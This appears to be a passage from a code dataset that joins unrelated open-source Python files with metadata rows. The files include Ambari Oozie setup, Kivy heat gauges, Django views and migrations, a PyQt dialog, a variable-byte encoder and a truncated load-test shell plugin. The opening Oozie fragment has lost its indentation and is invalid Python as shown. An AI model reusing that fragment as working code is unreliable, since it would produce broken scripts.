# Default to /usr/share/$TARGETSTACK-oozie/ext-2.2.zip as the first path
source_ext_zip_paths = get_oozie_ext_zip_source_paths(upgrade_type, params)
# Copy the first oozie ext-2.2.zip file that is found.
# This uses a list to handle the cases when migrating from some versions of BigInsights to HDP.
if source_ext_zip_paths is not None:
for source_ext_zip_path in source_ext_zip_paths:
if os.path.isfile(source_ext_zip_path):
configure_cmds.append(('cp', source_ext_zip_path, params.oozie_libext_dir))
configure_cmds.append(('chown', format('{oozie_user}:{user_group}'), format('{oozie_libext_dir}/{ext_js_file}')))
Execute(configure_cmds,
not_if=no_op_test,
sudo=True,
)
break
Directory(params.oozie_webapps_conf_dir,
owner = params.oozie_user,
group = params.user_group,
recursive_ownership = True,
recursion_follow_links = True,
)
# download the database JAR
download_database_library_if_needed()
#falcon el extension
if params.has_falcon_host:
Execute(format('{sudo} cp {falcon_home}/oozie/ext/falcon-oozie-el-extension-*.jar {oozie_libext_dir}'),
not_if = no_op_test)
Execute(format('{sudo} chown {oozie_user}:{user_group} {oozie_libext_dir}/falcon-oozie-el-extension-*.jar'),
not_if = no_op_test)
if params.lzo_enabled and len(params.all_lzo_packages) > 0:
Package(params.all_lzo_packages,
retry_on_repo_unavailability=params.agent_stack_retry_on_unavailability,
retry_count=params.agent_stack_retry_count)
Execute(format('{sudo} cp {hadoop_lib_home}/hadoop-lzo*.jar {oozie_lib_dir}'),
not_if = no_op_test,
)
prepare_war(params)
File(hashcode_file,
mode = 0644,
)
if params.stack_version_formatted and check_stack_feature(StackFeature.OOZIE_CREATE_HIVE_TEZ_CONFIGS, params.stack_version_formatted):
# Create hive-site and tez-site configs for oozie
Directory(params.hive_conf_dir,
create_parents = True,
owner = params.oozie_user,
group = params.user_group
)
if 'hive-site' in params.config['configurations']:
hive_site_config = update_credential_provider_path(params.config['configurations']['hive-site'],
'hive-site',
os.path.join(params.hive_conf_dir, 'hive-site.jceks'),
params.oozie_user,
params.user_group
)
XmlConfig("hive-site.xml",
conf_dir=params.hive_conf_dir,
configurations=hive_site_config,
configuration_attributes=params.config['configuration_attributes']['hive-site'],
owner=params.oozie_user,
group=params.user_group,
mode=0644
)
if 'tez-site' in params.config['configurations']:
XmlConfig( "tez-site.xml",
conf_dir = params.hive_conf_dir,
configurations = params.config['configurations']['tez-site'],
configuration_attributes=params.config['configuration_attributes']['tez-site'],
owner = params.oozie_user,
group = params.user_group,
mode = 0664
)
# If Atlas is also installed, need to generate Atlas Hive hook (hive-atlas-application.properties file) in directory
# {stack_root}/{current_version}/atlas/hook/hive/
# Because this is a .properties file instead of an xml file, it will not be read automatically by Oozie.
# However, should still save the file on this host so that can upload it to the Oozie Sharelib in DFS.
if has_atlas_in_cluster():
atlas_hook_filepath = os.path.join(params.hive_conf_dir, params.atlas_hook_filename)
Logger.info("Has atlas in cluster, will save Atlas Hive hook into location %s" % str(atlas_hook_filepath))
setup_atlas_hook(SERVICE.HIVE, params.hive_atlas_application_properties, atlas_hook_filepath, params.oozie_user, params.user_group)
Directory(params.oozie_server_dir,
owner = params.oozie_user,
group = params.user_group,
recursive_ownership = True,
)
if params.security_enabled:
File(os.path.join(params.conf_dir, 'zkmigrator_jaas.conf'),
owner=params.oozie_user,
group=params.user_group,
content=Template("zkmigrator_jaas.conf.j2")
)
def __parse_sharelib_from_output(output):
"""
Return the parent directory of the first path from the output of the "oozie admin -shareliblist command $comp"
Output will match pattern like:
Potential errors
[Available ShareLib]
hive
hdfs://server:8020/user/oozie/share/lib/lib_20160811235630/hive/file1.jar
hdfs://server:8020/user/oozie/share/lib/lib_20160811235630/hive/file2.jar
"""
if output is not None:
pattern = re.compile(r"\[Available ShareLib\]\n\S*?\n(.*share.*)", re.IGNORECASE)
m = pattern.search(output)
if m and len(m.groups()) == 1:
jar_path = m.group(1)
# Remove leading/trailing spaces and get the containing directory
sharelib_dir = os.path.dirname(jar_path.strip())
return sharelib_dir
return None
def copy_atlas_hive_hook_to_dfs_share_lib(upgrade_type=None, upgrade_direction=None):
"""
If the Atlas Hive Hook direcotry is present, Atlas is installed, and this is the first Oozie Server,
then copy the entire contents of that directory to the Oozie Sharelib in DFS, e.g.,
/usr/$stack/$current_version/atlas/hook/hive/ -> hdfs:///user/oozie/share/lib/lib_$timetamp/hive
:param upgrade_type: If in the middle of a stack upgrade, the type as UPGRADE_TYPE_ROLLING or UPGRADE_TYPE_NON_ROLLING
:param upgrade_direction: If in the middle of a stack upgrade, the direction as Direction.UPGRADE or Direction.DOWNGRADE.
"""
import params
# Calculate the effective version since this code can also be called during EU/RU in the upgrade direction.
effective_version = params.stack_version_formatted if upgrade_type is None else format_stack_version(params.version)
if not check_stack_feature(StackFeature.ATLAS_HOOK_SUPPORT, effective_version):
return
# Important that oozie_server_hostnames is sorted by name so that this only runs on a single Oozie server.
if not (len(params.oozie_server_hostnames) > 0 and params.hostname == params.oozie_server_hostnames[0]):
Logger.debug("Will not attempt to copy Atlas Hive hook to DFS since this is not the first Oozie Server "
"sorted by hostname.")
return
if not has_atlas_in_cluster():
Logger.debug("Will not attempt to copy Atlas Hve hook to DFS since Atlas is not installed on the cluster.")
return
if upgrade_type is not None and upgrade_direction == Direction.DOWNGRADE:
Logger.debug("Will not attempt to copy Atlas Hve hook to DFS since in the middle of Rolling/Express upgrade "
"and performing a Downgrade.")
return
current_version = get_current_version()
atlas_hive_hook_dir = format("{stack_root}/{current_version}/atlas/hook/hive/")
if not os.path.exists(atlas_hive_hook_dir):
Logger.error(format("ERROR. Atlas is installed in cluster but this Oozie server doesn't "
"contain directory {atlas_hive_hook_dir}"))
return
atlas_hive_hook_impl_dir = os.path.join(atlas_hive_hook_dir, "atlas-hive-plugin-impl")
num_files = len([name for name in os.listdir(atlas_hive_hook_impl_dir) if os.path.exists(os.path.join(atlas_hive_hook_impl_dir, name))])
Logger.info("Found %d files/directories inside Atlas Hive hook impl directory %s"% (num_files, atlas_hive_hook_impl_dir))
# This can return over 100 files, so take the first 5 lines after "Available ShareLib"
# Use -oozie http(s):localhost:{oozie_server_admin_port}/oozie as oozie-env does not export OOZIE_URL
command = format(r'source {conf_dir}/oozie-env.sh ; oozie admin -oozie {oozie_base_url} -shareliblist hive | grep "\[Available ShareLib\]" -A 5')
try:
code, out = call(command, user=params.oozie_user, tries=10, try_sleep=5, logoutput=True)
if code == 0 and out is not None:
hive_sharelib_dir = __parse_sharelib_from_output(out)
if hive_sharelib_dir is None:
raise Fail("Could not parse Hive sharelib from output.")
Logger.info("Parsed Hive sharelib = %s and will attempt to copy/replace %d files to it from %s" %
(hive_sharelib_dir, num_files, atlas_hive_hook_impl_dir))
params.HdfsResource(hive_sharelib_dir,
type="directory",
action="create_on_execute",
source=atlas_hive_hook_impl_dir,
user=params.hdfs_user,
owner=params.oozie_user,
group=params.hdfs_user,
mode=0755,
recursive_chown=True,
recursive_chmod=True,
replace_existing_files=True
)
Logger.info("Copying Atlas Hive hook properties file to Oozie Sharelib in DFS.")
atlas_hook_filepath_source = os.path.join(params.hive_conf_dir, params.atlas_hook_filename)
atlas_hook_file_path_dest_in_dfs = os.path.join(hive_sharelib_dir, params.atlas_hook_filename)
params.HdfsResource(atlas_hook_file_path_dest_in_dfs,
type="file",
source=atlas_hook_filepath_source,
action="create_on_execute",
owner=params.oozie_user,
group=params.hdfs_user,
mode=0755,
replace_existing_files=True
)
params.HdfsResource(None, action="execute")
# Update the sharelib after making any changes
# Use -oozie http(s):localhost:{oozie_server_admin_port}/oozie as oozie-env does not export OOZIE_URL
command = format("source {conf_dir}/oozie-env.sh ; oozie admin -oozie {oozie_base_url} -sharelibupdate")
code, out = call(command, user=params.oozie_user, tries=5, try_sleep=5, logoutput=True)
if code == 0 and out is not None:
Logger.info("Successfully updated the Oozie ShareLib")
else:
raise Exception("Could not update the Oozie ShareLib after uploading the Atlas Hive hook directory to DFS. "
"Code: %s" % str(code))
else:
raise Exception("Code is non-zero or output is empty. Code: %s" % str(code))
except Fail, e:
Logger.error("Failed to get Hive sharelib directory in DFS. %s" % str(e))
def download_database_library_if_needed(target_directory = None):
"""
Downloads the library to use when connecting to the Oozie database, if
necessary. The library will be downloaded to 'params.target' unless
otherwise specified.
:param target_directory: the location where the database library will be
downloaded to.
:return:
"""
import params
jdbc_drivers = ["com.mysql.jdbc.Driver",
"com.microsoft.sqlserver.jdbc.SQLServerDriver",
"oracle.jdbc.driver.OracleDriver","sap.jdbc4.sqlanywhere.IDriver"]
# check to see if the JDBC driver name is in the list of ones that need to
# be downloaded
if params.jdbc_driver_name not in jdbc_drivers or not params.jdbc_driver_jar:
return
if params.previous_jdbc_jar and os.path.isfile(params.previous_jdbc_jar):
File(params.previous_jdbc_jar, action='delete')
# if the target directory is not specified
if target_directory is None:
target_jar_with_directory = params.target
else:
# create the full path using the supplied target directory and the JDBC JAR
target_jar_with_directory = target_directory + os.path.sep + params.jdbc_driver_jar
if not os.path.exists(target_jar_with_directory):
File(params.downloaded_custom_connector,
content = DownloadSource(params.driver_curl_source))
if params.sqla_db_used:
untar_sqla_type2_driver = ('tar', '-xvf', params.downloaded_custom_connector, '-C', params.tmp_dir)
Execute(untar_sqla_type2_driver, sudo = True)
Execute(format("yes | {sudo} cp {jars_path_in_archive} {oozie_libext_dir}"))
Directory(params.jdbc_libs_dir,
create_parents = True)
Execute(format("yes | {sudo} cp {libs_path_in_archive} {jdbc_libs_dir}"))
Execute(format("{sudo} chown -R {oozie_user}:{user_group} {oozie_libext_dir}/*"))
else:
Execute(('cp', '--remove-destination', params.downloaded_custom_connector, target_jar_with_directory),
path=["/bin", "/usr/bin/"],
sudo = True)
File(target_jar_with_directory, owner = params.oozie_user,
group = params.user_group)
| apache-2.0 | 5,204,235,272,387,705,000 | 41.728597 | 262 | 0.665956 | false |
jorisvandenbossche/ircelsos | ircelsos/tests/test_util.py | 1 | 1165 | # -*- coding: utf-8 -*-
from __future__ import print_function, division
import unittest
import pytest
from ircelsos.util import print_stations, print_pollutants
from ircelsos import metadata
def strip(s):
s = s.splitlines()
s = [line.strip() for line in s]
s = "\n".join(s)
return s
@pytest.mark.usefixtures("capsys")
class TestTablePrinting():
def test_print_stations(self, capsys):
print_stations(['BETR801', 'BETR802'])
out, err = capsys.readouterr()
expected = """name | EU_code | location | region | type
-------+---------+------------+--------+--------
42R801 | BETR801 | Borgerhout | urban | Traffic
42R802 | BETR802 | Borgerhout | urban | Traffic
"""
assert strip(out) == strip(expected)
def test_print_pollutants(self, capsys):
print_pollutants(['42602 - NO2', '44201 - O3'])
out, err = capsys.readouterr()
expected = """id | short | name | stations
------------+-------+------------------+---------
42602 - NO2 | no2 | Nitrogen dioxide | 105
44201 - O3 | o3 | Ozone | 47
"""
assert strip(out) == strip(expected)
| bsd-2-clause | 5,899,053,136,330,087,000 | 26.738095 | 71 | 0.556223 | false |
PhilipHomburg/ripe.atlas.sagan | ripe/atlas/sagan/http.py | 1 | 2943 | from .base import Result, ValidationMixin
class Response(ValidationMixin):
def __init__(self, data, **kwargs):
ValidationMixin.__init__(self, **kwargs)
self.raw_data = data
self.af = self.ensure("af", int)
self.body_size = self.ensure("bsize", int)
self.head_size = self.ensure("hsize", int)
self.destination_address = self.ensure("dst_addr", str)
self.source_address = self.ensure("src_addr", str)
self.code = self.ensure("res", int)
self.response_time = self.ensure("rt", float)
self.version = self.ensure("ver", str)
if not self.destination_address:
self.destination_address = self.ensure("addr", str, self.destination_address)
if not self.source_address:
self.source_address = self.ensure("srcaddr", str, self.source_address)
if not self.code:
self._handle_malformation("No response code available")
error = self.ensure("err", str)
if error:
self._handle_error(error)
class HttpResult(Result):
METHOD_GET = "GET"
METHOD_POST = "POST"
METHOD_PUT = "PUT"
METHOD_DELETE = "DELETE"
METHOD_HEAD = "HEAD"
METHODS = {
METHOD_GET: "GET",
METHOD_POST: "POST",
METHOD_PUT: "PUT",
METHOD_DELETE: "DELETE",
METHOD_HEAD: "HEAD"
}
def __init__(self, data, **kwargs):
Result.__init__(self, data, **kwargs)
self.uri = self.ensure("uri", str)
self.method = None
self.responses = []
if "result" not in self.raw_data:
self._handle_malformation("No result value found")
return
if isinstance(self.raw_data["result"], list):
# All modern results
for response in self.raw_data["result"]:
self.responses.append(Response(response, **kwargs))
if self.responses:
method = self.raw_data["result"][0].get(
"method",
self.raw_data["result"][0].get("mode") # Firmware == 4300
)
if method:
method = method.replace("4", "").replace("6", "")
if method in self.METHODS.keys():
self.method = self.METHODS[method]
else:
# Firmware <= 1
response = self.raw_data["result"].split(" ")
self.method = response[0].replace("4", "").replace("6", "")
self.responses.append(Response({
"dst_addr": response[1],
"rt": float(response[2]) * 1000,
"res": int(response[3]),
"hsize": int(response[4]),
"bsize": int(response[5]),
}))
__all__ = (
"HttpResult"
)
| gpl-3.0 | 4,170,459,175,948,925,000 | 29.978947 | 89 | 0.49983 | false |
autosportlabs/RaceCapture_App | autosportlabs/racecapture/widgets/heat/heatgauge.py | 1 | 6048 | #
# Race Capture App
#
# Copyright (C) 2014-2017 Autosport Labs
#
# This file is part of the Race Capture App
#
# This is free software: you can redistribute it and/or modify it
# under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This software is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
#
# See the GNU General Public License for more details. You should
# have received a copy of the GNU General Public License along with
# this code. If not, see <http://www.gnu.org/licenses/>.
import kivy
kivy.require('1.10.0')
from kivy.uix.anchorlayout import AnchorLayout
from kivy.app import Builder
from kivy.graphics import *
from kivy.properties import NumericProperty, ListProperty, StringProperty
from kivy.logger import Logger
from autosportlabs.uix.color.colorgradient import HeatColorGradient
from kivy.core.image import Image as CoreImage
HEAT_GAUGE_KV = """
<TireHeatGauge>:
"""
class BrakeHeatGauge(AnchorLayout):
Builder.load_string(HEAT_GAUGE_KV)
zones = NumericProperty(None)
CENTER_SIZE_PCT = 0.5
ROTOR_IMAGE = CoreImage('autosportlabs/racecapture/widgets/heat/rotor.png')
TIRE_IMAGE = CoreImage('autosportlabs/racecapture/widgets/heat/tire.png')
def __init__(self, **kwargs):
super(BrakeHeatGauge, self).__init__(**kwargs)
self.heat_gradient = HeatColorGradient()
self.colors = []
self.values = []
self._init_view()
self.bind(pos=self._update_gauge)
self.bind(size=self._update_gauge)
self.bind(zones=self._update_gauge)
def on_zones(self, instance, value):
self._sync_zones()
def _init_view(self):
self._sync_zones()
def _sync_zones(self):
zones = self.zones
if zones is None:
return
values = self.values
values.extend([0] * (zones - len(values)))
colors = self.colors
colors.extend([Color()] * (zones - len(colors)))
self._update_gauge()
def set_value(self, zone, value):
try:
rgba = self.heat_gradient.get_color_value(value)
self.colors[zone].rgba = rgba
self.values[zone] = value
except IndexError:
pass
def _update_gauge(self, *args):
self.canvas.clear()
zones = self.zones
if zones is None or zones == 0:
return
x = self.pos[0]
y = self.pos[1]
width = self.size[0]
height = self.size[1]
min_size = min(width, height)
center_size = min_size * BrakeHeatGauge.CENTER_SIZE_PCT
rw = ((min_size - center_size) / float(zones))
center_x = x + (width / 2)
center_y = y + (height / 2)
index = zones
with self.canvas:
for i in range(0, zones):
color = self.heat_gradient.get_color_value(self.values[index - 1])
c = Color(rgba=color)
self.colors[index - 1] = c
segment_size = (index * (rw)) + center_size
c_x = center_x - segment_size / 2
c_y = center_y - segment_size / 2
Ellipse(pos=(c_x, c_y), size=(segment_size, segment_size))
index -= 1
Color(1.0, 1.0, 1.0, 1.0)
r_x = center_x - (center_size / 2)
r_y = center_y - (center_size / 2)
Rectangle(texture=BrakeHeatGauge.ROTOR_IMAGE.texture, pos=(r_x, r_y), size=(center_size, center_size))
def on_values(self, instance, value):
pass
class TireHeatGauge(AnchorLayout):
Builder.load_string(HEAT_GAUGE_KV)
zones = NumericProperty(None)
direction = StringProperty('left-right')
def __init__(self, **kwargs):
super(TireHeatGauge, self).__init__(**kwargs)
self.heat_gradient = HeatColorGradient()
self.colors = []
self.values = []
self._init_view()
self.bind(pos=self._update_gauge)
self.bind(size=self._update_gauge)
self.bind(zones=self._update_gauge)
self.bind(direction=self._update_gauge)
def on_zones(self, instance, value):
self._sync_zones()
def _init_view(self):
self._sync_zones()
def _sync_zones(self):
zones = self.zones
if zones is None:
return
values = self.values
values.extend([0] * (zones - len(values)))
colors = self.colors
colors.extend([Color()] * (zones - len(colors)))
self._update_gauge()
def set_value(self, zone, value):
try:
rgba = self.heat_gradient.get_color_value(value)
self.colors[zone].rgba = rgba
self.values[zone] = value
except IndexError:
pass
def _update_gauge(self, *args):
self.canvas.clear()
zones = self.zones
if zones is None or zones == 0:
return
x = self.pos[0]
y = self.pos[1]
width = self.size[0]
height = self.size[1]
rw = width / float(zones)
if self.direction == 'left-right':
index = 0
index_dir = 1
elif self.direction == 'right-left':
index = zones - 1
index_dir = -1
else:
raise Exception('Invalid direction {}'.self.dir)
with self.canvas:
for i in range(0, zones):
xp = x + (rw * i)
color = self.heat_gradient.get_color_value(self.values[index])
c = Color(rgba=color)
self.colors[index] = c
Rectangle(pos=(xp, y), size=(rw, height))
index += index_dir
Color(rgba=(0.0, 0.0, 0.0, 1.0))
Rectangle(texture=BrakeHeatGauge.TIRE_IMAGE.texture, pos=(x, y), size=(width, height))
def on_values(self, instance, value):
pass
| gpl-3.0 | 8,670,585,709,165,813,000 | 30.831579 | 114 | 0.582837 | false |
stencila/hub | manager/projects/ui/views/reviews.py | 1 | 1679 | from django.http import HttpRequest, HttpResponse
from django.shortcuts import render
from projects.api.serializers import ReviewUpdateSerializer
from projects.api.views.reviews import ProjectsReviewsViewSet
def list(request: HttpRequest, *args, **kwargs) -> HttpResponse:
"""
List reviews for a project.
"""
viewset = ProjectsReviewsViewSet.init("list", request, args, kwargs)
reviews = viewset.get_queryset()
context = viewset.get_response_context(queryset=reviews)
meta = viewset.get_project().get_meta()
return render(request, "projects/reviews/list.html", dict(**context, meta=meta))
def create(request: HttpRequest, *args, **kwargs) -> HttpResponse:
"""
Create a review for a project.
"""
viewset = ProjectsReviewsViewSet.init("create", request, args, kwargs)
serializer = viewset.get_serializer()
context = viewset.get_response_context(serializer=serializer)
meta = viewset.get_project().get_meta()
return render(request, "projects/reviews/create.html", dict(**context, meta=meta))
def retrieve(request: HttpRequest, *args, **kwargs) -> HttpResponse:
"""
Retrieve a review from a project.
"""
viewset = ProjectsReviewsViewSet.init("retrieve", request, args, kwargs)
review = viewset.get_object()
context = viewset.get_response_context(instance=review)
serializer = (
ReviewUpdateSerializer()
if context.get("is_editor") or context.get("is_user")
else None
)
meta = viewset.get_project().get_meta()
return render(
request,
"projects/reviews/retrieve.html",
dict(**context, serializer=serializer, meta=meta),
)
| apache-2.0 | -6,900,870,597,921,345,000 | 34.723404 | 86 | 0.69327 | false |
mxmaslin/Test-tasks | tests_django/apps/playschool/migrations/0001_initial.py | 1 | 1954 | # Generated by Django 2.1.1 on 2018-09-29 17:59
import django.core.validators
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
initial = True
dependencies = [
]
operations = [
migrations.CreateModel(
name='Record',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('date', models.DateField(auto_now_add=True)),
('has_came_with', models.CharField(choices=[('M', 'Mother'), ('F', 'Father')], default='M', max_length=1)),
('time_arrived', models.DateTimeField()),
('time_departed', models.DateTimeField()),
],
options={
'ordering': ('-date',),
},
),
migrations.CreateModel(
name='Scholar',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('photo', models.ImageField(blank=True, null=True, upload_to='playschool/images/%Y/%m/%d')),
('name', models.CharField(max_length=50)),
('sex', models.CharField(choices=[('M', 'Boy'), ('F', 'Girl')], default='F', max_length=1)),
('birth_date', models.DateField()),
('school_class', models.PositiveIntegerField(default=1, validators=[django.core.validators.MinValueValidator(1), django.core.validators.MaxValueValidator(11)])),
('is_studying', models.BooleanField()),
],
options={
'ordering': ('school_class', 'name'),
},
),
migrations.AddField(
model_name='record',
name='scholar',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='playschool.Scholar'),
),
]
| gpl-3.0 | 5,469,782,674,536,385,000 | 38.877551 | 177 | 0.547083 | false |
minddistrict/doublespeak | setup.py | 1 | 1486 | from setuptools import setup, find_packages
version = '0.4.dev0'
long_desc = open("README.rst").read() + "\n" + open('CHANGES.txt').read()
setup(
name='doublespeak',
version=version,
author='Minddistrict',
url='https://github.com/minddistrict/doublespeak',
license='BSD',
package_dir={'': 'src'},
packages=find_packages('src'),
keywords='Javascript translations Babel',
classifiers=[
"Programming Language :: Python",
"Intended Audience :: Developers",
"License :: OSI Approved :: BSD License",
"Topic :: Software Development :: Internationalization",
"Programming Language :: Python :: 2.7"
],
description="Babel/distutils commands to help with managing Javascript "
"translations.",
long_description=long_desc,
include_package_data=True,
namespace_packages=[],
zip_safe=False,
install_requires=[
'setuptools',
'Babel'
],
entry_points={
'distutils.commands': [
'compile_js_catalog = doublespeak.message:compile_js_catalog',
'extract_js_messages = doublespeak.message:extract_js_messages',
'init_js_catalog = doublespeak.message:init_js_catalog',
'update_js_catalog = doublespeak.message:update_js_catalog',
],
'distutils.setup_keywords': [
'js_message_extractors = '
'doublespeak.message:check_js_message_extractors'
]},
)
| bsd-3-clause | 2,762,498,902,893,273,000 | 33.55814 | 76 | 0.612382 | false |
handsomegui/Gereqi | gereqi/Ui_about.py | 1 | 4402 | # -*- coding: utf-8 -*-
# Form implementation generated from reading ui file 'about.ui'
#
# Created: Fri Sep 10 23:16:30 2010
# by: PyQt4 UI code generator 4.7.3
#
# WARNING! All changes made in this file will be lost!
from PyQt4 import QtCore, QtGui
class Ui_About(object):
def setupUi(self, About):
About.setObjectName("About")
About.resize(253, 309)
icon = QtGui.QIcon()
icon.addPixmap(QtGui.QPixmap(":/Icons/app.png"), QtGui.QIcon.Normal, QtGui.QIcon.Off)
About.setWindowIcon(icon)
self.gridLayout = QtGui.QGridLayout(About)
self.gridLayout.setObjectName("gridLayout")
self.buttonBox = QtGui.QDialogButtonBox(About)
self.buttonBox.setOrientation(QtCore.Qt.Horizontal)
self.buttonBox.setStandardButtons(QtGui.QDialogButtonBox.Close)
self.buttonBox.setObjectName("buttonBox")
self.gridLayout.addWidget(self.buttonBox, 1, 0, 1, 1)
self.textBrowser = QtGui.QTextBrowser(About)
self.textBrowser.setStyleSheet("background-color: rgba(255, 255, 255, 0);")
self.textBrowser.setFrameShape(QtGui.QFrame.NoFrame)
self.textBrowser.setFrameShadow(QtGui.QFrame.Plain)
self.textBrowser.setTabChangesFocus(True)
self.textBrowser.setAcceptRichText(False)
self.textBrowser.setTextInteractionFlags(QtCore.Qt.LinksAccessibleByMouse)
self.textBrowser.setOpenExternalLinks(True)
self.textBrowser.setOpenLinks(False)
self.textBrowser.setObjectName("textBrowser")
self.gridLayout.addWidget(self.textBrowser, 0, 0, 1, 1)
self.retranslateUi(About)
QtCore.QObject.connect(self.buttonBox, QtCore.SIGNAL("accepted()"), About.accept)
QtCore.QObject.connect(self.buttonBox, QtCore.SIGNAL("rejected()"), About.reject)
QtCore.QMetaObject.connectSlotsByName(About)
def retranslateUi(self, About):
About.setWindowTitle(QtGui.QApplication.translate("About", "About Gereqi", None, QtGui.QApplication.UnicodeUTF8))
self.textBrowser.setHtml(QtGui.QApplication.translate("About", "<!DOCTYPE HTML PUBLIC \"-//W3C//DTD HTML 4.0//EN\" \"http://www.w3.org/TR/REC-html40/strict.dtd\">\n"
"<html><head><meta name=\"qrichtext\" content=\"1\" /><style type=\"text/css\">\n"
"p, li { white-space: pre-wrap; }\n"
"</style></head><body style=\" font-family:\'Droid Sans\'; font-size:10pt; font-weight:400; font-style:normal;\">\n"
"<p align=\"right\" style=\" margin-top:0px; margin-bottom:0px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px;\"><img src=\":/Icons/app.png\" /></p>\n"
"<p style=\"-qt-paragraph-type:empty; margin-top:0px; margin-bottom:0px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px; font-size:18pt; font-weight:600;\"></p>\n"
"<p style=\" margin-top:0px; margin-bottom:0px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px;\"><span style=\" font-size:18pt; font-weight:600;\">Gereqi</span></p>\n"
"<p style=\"-qt-paragraph-type:empty; margin-top:0px; margin-bottom:0px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px;\"></p>\n"
"<p style=\" margin-top:0px; margin-bottom:0px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px;\">version 0.4.2</p>\n"
"<p style=\"-qt-paragraph-type:empty; margin-top:0px; margin-bottom:0px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px;\"></p>\n"
"<p style=\" margin-top:0px; margin-bottom:0px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px;\">© 2009,2010 Contributors</p>\n"
"<p style=\"-qt-paragraph-type:empty; margin-top:0px; margin-bottom:0px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px;\"></p>\n"
"<p style=\"-qt-paragraph-type:empty; margin-top:0px; margin-bottom:0px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px;\"></p>\n"
"<p style=\"-qt-paragraph-type:empty; margin-top:0px; margin-bottom:0px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px;\"></p>\n"
"<p style=\" margin-top:0px; margin-bottom:0px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px;\">Visit <a href=\"http://code.google.com/p/gereqi/\"><span style=\" text-decoration: underline; color:#e85290;\">http://code.google.com/p/gereqi/</span></a></p></body></html>", None, QtGui.QApplication.UnicodeUTF8))
| gpl-3.0 | -5,543,503,231,855,172,000 | 72.35 | 335 | 0.696887 | false |
enfk/hugedatabook-vbcode-python | VariableBiteCode.py | 1 | 3087 | #!/usr/bin/env python
from struct import pack, unpack
# http://nlp.stanford.edu/IR-book/html/htmledition/variable-byte-codes-1.html
def vb_encode(numbers):
if isinstance(numbers, int):
return vb_encode_number(numbers)
bytestream = ''
for n in numbers:
bytes = vb_encode_number(n)
bytestream += bytes
return bytestream
def vb_encode_number_orginal(n):
bytes = []
bytestream = ''
while True:
bytes.insert(0, n%128)
if n < 128:
break
n = n / 128
bytes[-1] += 128
for byte in bytes:
bytestream += pack('B', byte)
return bytestream
# http://websystemsengineering.blogspot.jp/2012/12/variable-byte-code-how-to.html
def vb_encode_number(n):
i = 0
bytestream = ''
while True:
if i == 0:
bytestream += pack('B', (n & 0b1111111) + 128)
else:
bytestream = pack('B', (n & 0b1111111)) + bytestream
if n < 128:
break
n = n >> 7
i += 1
return bytestream
def vb_decode(bytestream):
numbers = []
n = 0
unpacked = unpack('%dB' % len(bytestream), bytestream)
for i in range(len(unpacked)):
if unpacked[i] < 128:
n = 128 * n + unpacked[i]
else:
n = 128 * n + (unpacked[i] - 128)
numbers.append(n)
n = 0
return numbers
# http://www.ninxit.com/blog/2010/12/15/vbcode-python/
def vb_encode_X(numbers):
if isinstance(numbers, int):
numbers = [numbers]
bytestream = ''
for n in numbers:
bytes = []
while True:
bytes.insert(0, n % 128)
if n < 128:
break
n = n / 128
bytes[-1] += 128
bytestream += pack('%dB' % len(bytes), *bytes)
return bytestream
def vb_decode_X(bytestream):
n = 0
numbers = []
bytestream = unpack('%dB' % len(bytestream), bytestream)
for byte in bytestream:
if byte < 128:
n = 128 * n + byte
else:
n = 128 * n + (byte - 128)
numbers.append(n)
n = 0
return numbers
def get_bit(byteval,idx):
return ((byteval&(1<<idx))!=0);
# test
if __name__ == '__main__':
# format() require python 2.6 or more.
bytestream = vb_encode([17,0,0])
print ''.join([format(b, '08b') for b in unpack('%dB' % len(bytestream), bytestream)])
print vb_decode(bytestream)
def test_vb_encode(numbers, ok):
bytestream = vb_encode(numbers)
assert ''.join([format(b, '08b') for b in unpack('%dB' % len(bytestream), bytestream)]) == ok
print "test ok. %s -> %s" % (numbers, ok)
test_vb_encode(1, '10000001')
test_vb_encode(5, '10000101')
test_vb_encode(127, '11111111')
test_vb_encode(128, '00000001' + '10000000')
test_vb_encode(129, '00000001' + '10000001')
test_vb_encode(210192, '00001100'+'01101010'+'10010000')
import sys, random
for i in xrange(1000):
n = random.randint(0, sys.maxint)
assert vb_decode(vb_encode(n))[0] == n
| mit | -3,475,025,522,714,339,000 | 26.078947 | 101 | 0.547133 | false |
nnugumanov/yandex-tank | yandextank/plugins/ShellExec/plugin.py | 1 | 2286 | '''
Contains shellexec plugin
'''
from ...common import util
from ...common.interfaces import AbstractPlugin
class Plugin(AbstractPlugin):
'''
ShellExec plugin
allows executing shell scripts before/after test
'''
SECTION = 'shellexec'
def __init__(self, core, config_section):
AbstractPlugin.__init__(self, core, config_section)
self.catch_out = False
self.end = None
self.poll = None
self.prepare = None
self.start = None
self.postprocess = None
@staticmethod
def get_key():
return __file__
def get_available_options(self):
return ["prepare", "start", "end", "poll", "post_process", "catch_out"]
def configure(self):
self.catch_out = True if self.get_option("catch_out", False) else False
self.prepare = self.get_option("prepare", '')
self.start = self.get_option("start", '')
self.end = self.get_option("end", '')
self.poll = self.get_option("poll", '')
self.postprocess = self.get_option("post_process", '')
def prepare_test(self):
if self.prepare:
self.execute(self.prepare)
def start_test(self):
if self.start:
self.execute(self.start)
def is_test_finished(self):
if self.poll:
self.log.info("Executing: %s", self.poll)
retcode = util.execute(
self.poll,
shell=True,
poll_period=0.1,
catch_out=self.catch_out)[0]
if retcode:
self.log.warn(
"Non-zero exit code, interrupting test: %s", retcode)
return retcode
return -1
def end_test(self, retcode):
if self.end:
